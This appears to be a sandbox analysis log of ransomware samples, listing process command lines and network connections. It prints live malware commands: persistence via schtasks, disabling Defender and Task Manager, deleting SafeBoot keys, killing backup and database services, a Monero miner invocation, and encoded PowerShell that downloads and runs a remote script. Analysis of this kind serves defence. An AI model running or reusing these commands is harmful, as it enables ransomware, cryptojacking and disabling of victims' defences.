Trojan-Ransom.Win32.Digitala.do-7424ec4f70d0c951ad4d4621926aa964fec54031f79aa2c83139dae17c2f3239.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /RU SYSTEM /RL HIGHEST /F
C:\Users\Admin\AppData\Local\Temp\wujek.exe
"C:\Users\Admin\AppData\Local\Temp\wujek.exe"
C:\831897~1.EXE
"C:\831897~1.EXE"
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.GandCrypt.jfg-c8c08da8d15d8d673674a59eeabd6b212647b57a846b72b6c76b321f34401f69.exe
Trojan-Ransom.Win32.GandCrypt.jfg-c8c08da8d15d8d673674a59eeabd6b212647b57a846b72b6c76b321f34401f69.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 9396 -ip 9396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9396 -s 392
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN hrm /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /RU SYSTEM /RL HIGHEST /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN Harma /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h +s harma.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\harma.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Users\Admin\AppData\Roaming\MAINPROC.exe
"C:\Users\Admin\AppData\Roaming\MAINPROC.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
C:\Windows\SysWOW64\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im veeam*
C:\Windows\explorer.exe
C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45R4Kg7FJmq8ExsZZwNgca2YdATVRcza4bCwpzf9dGdabt5om6SYLuVfnwFRVyj8dx9paSBaN9PXkELkJQNs3WvGMZ9NqUs --pass=csgocheat --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=4 --unam-idle-cpu=100 --tls --unam-stealth
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
"C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /im sql*
C:\Windows\xk.exe
C:\Windows\xk.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
"C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\IExplorer.exe
C:\Windows\system32\IExplorer.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMgAzADcANwA1ADUANQA3ADIAOQAwADYAMwA5ADgANwAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\syswow64\svchost.exe"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
C:\Windows\SysWOW64\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
C:\Windows\SysWOW64\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\system.exe" "system.exe" ENABLE
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\Temp\SMSS.exe"
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\xk.exe
C:\Windows\xk.exe
C:\Windows\SysWOW64\IExplorer.exe
C:\Windows\system32\IExplorer.exe
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.177:139 | tcp | |
| N/A | 10.127.0.176:139 | tcp | |
| N/A | 10.127.0.178:139 | tcp | |
| N/A | 10.127.0.179:139 | tcp | |
| N/A | 10.127.0.181:139 | tcp | |
| N/A | 10.127.0.180:139 | tcp | |
| N/A | 10.127.0.182:139 | tcp | |
| N/A | 10.127.0.183:139 | tcp | |
| N/A | 10.127.0.184:139 | tcp | |
| N/A | 10.127.0.185:139 | tcp | |
| N/A | 10.127.0.187:139 | tcp | |
| N/A | 10.127.0.186:139 | tcp | |
| N/A | 10.127.0.188:139 | tcp | |
| N/A | 10.127.0.189:139 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| N/A | 10.127.0.193:139 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.197:139 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.0.201:139 | tcp | |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.0.208:139 | tcp | |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.0.149:139 | tcp | |
| N/A | 10.127.0.148:139 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.0.213:139 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.0.216:139 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.0.220:139 | tcp | |
| N/A | 10.127.0.221:139 | tcp | |
| N/A | 10.127.0.222:139 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.0.225:139 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.0.240:139 | tcp | |
| N/A | 10.127.0.242:139 | tcp | |
| N/A | 10.127.0.243:139 | tcp | |
| N/A | 10.127.0.244:139 | tcp | |
| N/A | 10.127.0.246:139 | tcp | |
| N/A | 10.127.0.245:139 | tcp | |
| N/A | 10.127.0.247:139 | tcp | |
| N/A | 10.127.0.248:139 | tcp | |
| N/A | 10.127.0.249:139 | tcp | |
| N/A | 10.127.0.251:139 | tcp | |
| N/A | 10.127.0.250:139 | tcp | |
| N/A | 10.127.0.253:139 | tcp | |
| N/A | 10.127.0.254:139 | tcp | |
| FI | 37.27.61.180:139 | tcp | |
| N/A | 10.127.0.252:139 | tcp | |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| LV | 195.123.212.113:1357 | tcp | |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | videozbuzz.altervista.org | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 113.212.123.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.244.23.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.219.218.216.in-addr.arpa | udp |
| N/A | 127.0.0.1:8989 | tcp | |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| N/A | 10.127.255.2:445 | tcp | |
| N/A | 10.127.255.21:445 | tcp | |
| N/A | 10.127.255.4:445 | tcp | |
| N/A | 10.127.255.10:445 | tcp | |
| N/A | 10.127.255.30:445 | tcp | |
| N/A | 10.127.255.47:445 | tcp | |
| N/A | 10.127.255.28:445 | tcp | |
| N/A | 10.127.255.37:445 | tcp | |
| N/A | 10.127.255.64:445 | tcp | |
| N/A | 10.127.255.52:445 | tcp | |
| N/A | 10.127.255.18:445 | tcp | |
| N/A | 10.127.255.51:445 | tcp | |
| N/A | 10.127.255.160:445 | tcp | |
| N/A | 10.127.255.33:445 | tcp | |
| N/A | 10.127.255.12:445 | tcp | |
| N/A | 10.127.255.16:445 | tcp | |
| N/A | 10.127.255.56:445 | tcp | |
| N/A | 10.127.255.42:445 | tcp | |
| N/A | 10.127.255.54:445 | tcp | |
| N/A | 10.127.255.9:445 | tcp | |
| N/A | 10.127.255.41:445 | tcp | |
| N/A | 10.127.255.46:445 | tcp | |
| N/A | 10.127.255.59:445 | tcp | |
| N/A | 10.127.255.45:445 | tcp | |
| N/A | 10.127.255.58:445 | tcp | |
| N/A | 10.127.255.3:445 | tcp | |
| N/A | 10.127.255.49:445 | tcp | |
| N/A | 10.127.255.15:445 | tcp | |
| N/A | 10.127.255.27:445 | tcp | |
| N/A | 10.127.255.26:445 | tcp | |
| N/A | 10.127.255.0:445 | tcp | |
| N/A | 10.127.255.35:445 | tcp | |
| N/A | 10.127.255.50:445 | tcp | |
| N/A | 10.127.255.55:445 | tcp | |
| N/A | 10.127.255.5:445 | tcp | |
| N/A | 10.127.255.13:445 | tcp | |
| N/A | 10.127.255.61:445 | tcp | |
| N/A | 10.127.255.14:445 | tcp | |
| N/A | 10.127.255.24:445 | tcp | |
| N/A | 10.127.255.40:445 | tcp | |
| N/A | 10.127.255.20:445 | tcp | |
| N/A | 10.127.255.31:445 | tcp | |
| N/A | 10.127.255.6:445 | tcp | |
| N/A | 10.127.255.29:445 | tcp | |
| N/A | 10.127.255.1:445 | tcp | |
| N/A | 10.127.255.60:445 | tcp | |
| N/A | 10.127.255.36:445 | tcp | |
| N/A | 10.127.255.44:445 | tcp | |
| N/A | 10.127.255.53:445 | tcp | |
| N/A | 10.127.255.72:445 | tcp | |
| N/A | 10.127.255.8:445 | tcp | |
| N/A | 10.127.255.63:445 | tcp | |
| N/A | 10.127.255.17:445 | tcp | |
| N/A | 10.127.255.39:445 | tcp | |
| N/A | 10.127.255.34:445 | tcp | |
| N/A | 10.127.255.81:445 | tcp | |
| N/A | 10.127.255.11:445 | tcp | |
| N/A | 10.127.255.25:445 | tcp | |
| N/A | 10.127.255.62:445 | tcp | |
| N/A | 10.127.255.89:445 | tcp | |
| N/A | 10.127.255.22:445 | tcp | |
| N/A | 10.127.255.19:445 | tcp | |
| N/A | 10.127.255.73:445 | tcp | |
| N/A | 10.127.255.32:445 | tcp | |
| N/A | 10.127.255.23:445 | tcp | |
| N/A | 10.127.255.43:445 | tcp | |
| N/A | 10.127.255.71:445 | tcp | |
| N/A | 10.127.255.79:445 | tcp | |
| N/A | 10.127.255.57:445 | tcp | |
| N/A | 10.127.255.7:445 | tcp | |
| N/A | 10.127.255.38:445 | tcp | |
| N/A | 10.127.255.48:445 | tcp | |
| N/A | 10.127.255.68:445 | tcp | |
| N/A | 10.127.255.86:445 | tcp | |
| N/A | 10.127.255.78:445 | tcp | |
| N/A | 10.127.255.88:445 | tcp | |
| N/A | 10.127.255.87:445 | tcp | |
| N/A | 10.127.255.75:445 | tcp | |
| N/A | 10.127.255.70:445 | tcp | |
| N/A | 10.127.255.76:445 | tcp | |
| N/A | 10.127.255.66:445 | tcp | |
| N/A | 10.127.255.84:445 | tcp | |
| N/A | 10.127.255.85:445 | tcp | |
| N/A | 10.127.255.74:445 | tcp | |
| N/A | 10.127.255.80:445 | tcp | |
| N/A | 10.127.255.65:445 | tcp | |
| N/A | 10.127.255.82:445 | tcp | |
| N/A | 10.127.255.69:445 | tcp | |
| US | 8.8.8.8:53 | kashbilly2.ddns.net | udp |
| N/A | 10.127.255.77:445 | tcp | |
| US | 8.8.8.8:53 | lowotery.host | udp |
| N/A | 10.127.255.83:445 | tcp | |
| US | 199.195.249.127:443 | tcp | |
| N/A | 10.127.255.67:445 | tcp | |
| N/A | 10.127.255.104:445 | tcp | |
| N/A | 10.127.255.138:445 | tcp | |
| N/A | 10.127.255.140:445 | tcp | |
| N/A | 10.127.255.111:445 | tcp | |
| N/A | 10.127.255.148:445 | tcp | |
| N/A | 10.127.255.92:445 | tcp | |
| N/A | 10.127.255.118:445 | tcp | |
| N/A | 10.127.255.151:445 | tcp | |
| N/A | 10.127.255.152:445 | tcp | |
| N/A | 10.127.255.153:445 | tcp | |
| N/A | 10.127.255.102:445 | tcp | |
| N/A | 10.127.255.105:445 | tcp | |
| N/A | 10.127.255.146:445 | tcp | |
| N/A | 10.127.255.117:445 | tcp | |
| N/A | 10.127.255.149:445 | tcp | |
| N/A | 10.127.255.103:445 | tcp | |
| N/A | 10.127.255.114:445 | tcp | |
| N/A | 10.127.255.133:445 | tcp | |
| N/A | 10.127.255.135:445 | tcp | |
| N/A | 10.127.255.121:445 | tcp | |
| N/A | 10.127.255.125:445 | tcp | |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| N/A | 10.127.255.142:445 | tcp | |
| N/A | 10.127.255.94:445 | tcp | |
| N/A | 10.127.255.98:445 | tcp | |
| N/A | 10.127.255.112:445 | tcp | |
| N/A | 10.127.255.115:445 | tcp | |
| N/A | 10.127.255.90:445 | tcp | |
| N/A | 10.127.255.99:445 | tcp | |
| N/A | 10.127.255.144:445 | tcp | |
| N/A | 10.127.255.131:445 | tcp | |
| N/A | 10.127.255.101:445 | tcp | |
| N/A | 10.127.255.154:445 | tcp | |
| N/A | 10.127.255.126:445 | tcp | |
| N/A | 10.127.255.137:445 | tcp | |
| N/A | 10.127.255.96:445 | tcp | |
| N/A | 10.127.255.120:445 | tcp | |
| N/A | 10.127.255.132:445 | tcp | |
| N/A | 10.127.255.107:445 | tcp | |
| N/A | 10.127.255.123:445 | tcp | |
| N/A | 10.127.255.108:445 | tcp | |
| N/A | 10.127.255.116:445 | tcp | |
| N/A | 10.127.255.134:445 | tcp | |
| N/A | 10.127.255.150:445 | tcp | |
| N/A | 10.127.255.113:445 | tcp | |
| N/A | 10.127.255.122:445 | tcp | |
| N/A | 10.127.255.143:445 | tcp | |
| N/A | 10.127.255.147:445 | tcp | |
| N/A | 10.127.255.127:445 | tcp | |
| N/A | 10.127.255.129:445 | tcp | |
| N/A | 10.127.255.145:445 | tcp | |
| N/A | 10.127.255.106:445 | tcp | |
| N/A | 10.127.255.91:445 | tcp | |
| N/A | 10.127.255.124:445 | tcp | |
| N/A | 10.127.255.139:445 | tcp | |
| N/A | 10.127.255.97:445 | tcp | |
| N/A | 10.127.255.110:445 | tcp | |
| N/A | 10.127.255.100:445 | tcp | |
| N/A | 10.127.255.141:445 | tcp | |
| N/A | 10.127.255.119:445 | tcp | |
| N/A | 10.127.255.93:445 | tcp | |
| N/A | 10.127.255.128:445 | tcp | |
| N/A | 10.127.255.95:445 | tcp | |
| N/A | 10.127.255.130:445 | tcp | |
| N/A | 10.127.255.136:445 | tcp | |
| N/A | 10.127.255.109:445 | tcp | |
| US | 8.8.8.8:53 | fadbook.ddns.net | udp |
| MA | 102.100.203.79:8899 | fadbook.ddns.net | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | divathemes.com | udp |
| US | 208.91.197.7:80 | divathemes.com | tcp |
| N/A | 10.127.255.161:445 | tcp | |
| N/A | 10.127.255.157:445 | tcp | |
| N/A | 10.127.255.180:445 | tcp | |
| N/A | 10.127.255.235:445 | tcp | |
| N/A | 10.127.255.190:445 | tcp | |
| N/A | 10.127.255.210:445 | tcp | |
| N/A | 10.127.255.221:445 | tcp | |
| N/A | 10.127.255.230:445 | tcp | |
| N/A | 10.127.255.174:445 | tcp | |
| N/A | 10.127.255.196:445 | tcp | |
| N/A | 10.127.255.181:445 | tcp | |
| N/A | 10.127.255.171:445 | tcp | |
| N/A | 10.127.255.216:445 | tcp | |
| N/A | 10.127.255.243:445 | tcp | |
| N/A | 10.127.255.159:445 | tcp | |
| N/A | 10.127.255.254:445 | tcp | |
| N/A | 10.127.255.165:445 | tcp | |
| US | 8.8.8.8:53 | 7.197.91.208.in-addr.arpa | udp |
| N/A | 10.127.255.233:445 | tcp | |
| N/A | 10.127.255.155:445 | tcp | |
| N/A | 10.127.255.220:445 | tcp | |
| N/A | 10.127.255.184:445 | tcp | |
| N/A | 10.127.255.204:445 | tcp | |
| N/A | 10.127.255.251:445 | tcp | |
| N/A | 10.127.255.185:445 | tcp | |
| N/A | 10.127.255.166:445 | tcp | |
| N/A | 10.127.255.241:445 | tcp | |
| N/A | 10.127.255.179:445 | tcp | |
| N/A | 10.127.255.207:445 | tcp | |
| N/A | 10.127.255.178:445 | tcp | |
| N/A | 10.127.255.158:445 | tcp | |
| N/A | 10.127.255.169:445 | tcp | |
| N/A | 10.127.255.156:445 | tcp | |
| N/A | 10.127.255.187:445 | tcp | |
| N/A | 10.127.255.183:445 | tcp | |
| N/A | 10.127.255.218:445 | tcp | |
| N/A | 10.127.255.208:445 | tcp | |
| N/A | 10.127.255.173:445 | tcp | |
| N/A | 10.127.255.200:445 | tcp | |
| N/A | 10.127.255.246:445 | tcp | |
| N/A | 10.127.255.182:445 | tcp | |
| N/A | 10.127.255.223:445 | tcp | |
| N/A | 10.127.255.249:445 | tcp | |
| N/A | 10.127.255.175:445 | tcp | |
| N/A | 10.127.255.163:445 | tcp | |
| N/A | 10.127.255.197:445 | tcp | |
| N/A | 10.127.255.227:445 | tcp | |
| N/A | 10.127.255.162:445 | tcp | |
| N/A | 10.127.255.205:445 | tcp | |
| N/A | 10.127.255.225:445 | tcp | |
| N/A | 10.127.255.202:445 | tcp | |
| N/A | 10.127.255.192:445 | tcp | |
| N/A | 10.127.255.164:445 | tcp | |
| N/A | 10.127.255.170:445 | tcp | |
| N/A | 10.127.255.194:445 | tcp | |
| N/A | 10.127.255.177:445 | tcp | |
| N/A | 10.127.255.199:445 | tcp | |
| N/A | 10.127.255.176:445 | tcp | |
| N/A | 10.127.255.215:445 | tcp | |
| N/A | 10.127.255.224:445 | tcp | |
| N/A | 10.127.255.168:445 | tcp | |
| N/A | 10.127.255.213:445 | tcp | |
| N/A | 10.127.255.172:445 | tcp | |
| N/A | 10.127.255.212:445 | tcp | |
| N/A | 10.127.255.238:445 | tcp | |
| N/A | 10.127.255.167:445 | tcp | |
| N/A | 10.127.255.211:445 | tcp | |
| N/A | 10.127.255.252:445 | tcp | |
| N/A | 10.127.255.232:445 | tcp | |
| N/A | 10.127.255.242:445 | tcp | |
| N/A | 10.127.255.250:445 | tcp | |
| N/A | 10.127.255.217:445 | tcp | |
| N/A | 10.127.255.236:445 | tcp | |
| N/A | 10.127.255.229:445 | tcp | |
| N/A | 10.127.255.188:445 | tcp | |
| N/A | 10.127.255.198:445 | tcp | |
| N/A | 10.127.255.214:445 | tcp | |
| N/A | 10.127.255.203:445 | tcp | |
| N/A | 10.127.255.237:445 | tcp | |
| N/A | 10.127.255.219:445 | tcp | |
| N/A | 10.127.255.226:445 | tcp | |
| N/A | 10.127.255.206:445 | tcp | |
| N/A | 10.127.255.193:445 | tcp | |
| N/A | 10.127.255.240:445 | tcp | |
| N/A | 10.127.255.191:445 | tcp | |
| N/A | 10.127.255.222:445 | tcp | |
| N/A | 10.127.255.248:445 | tcp | |
| N/A | 10.127.255.239:445 | tcp | |
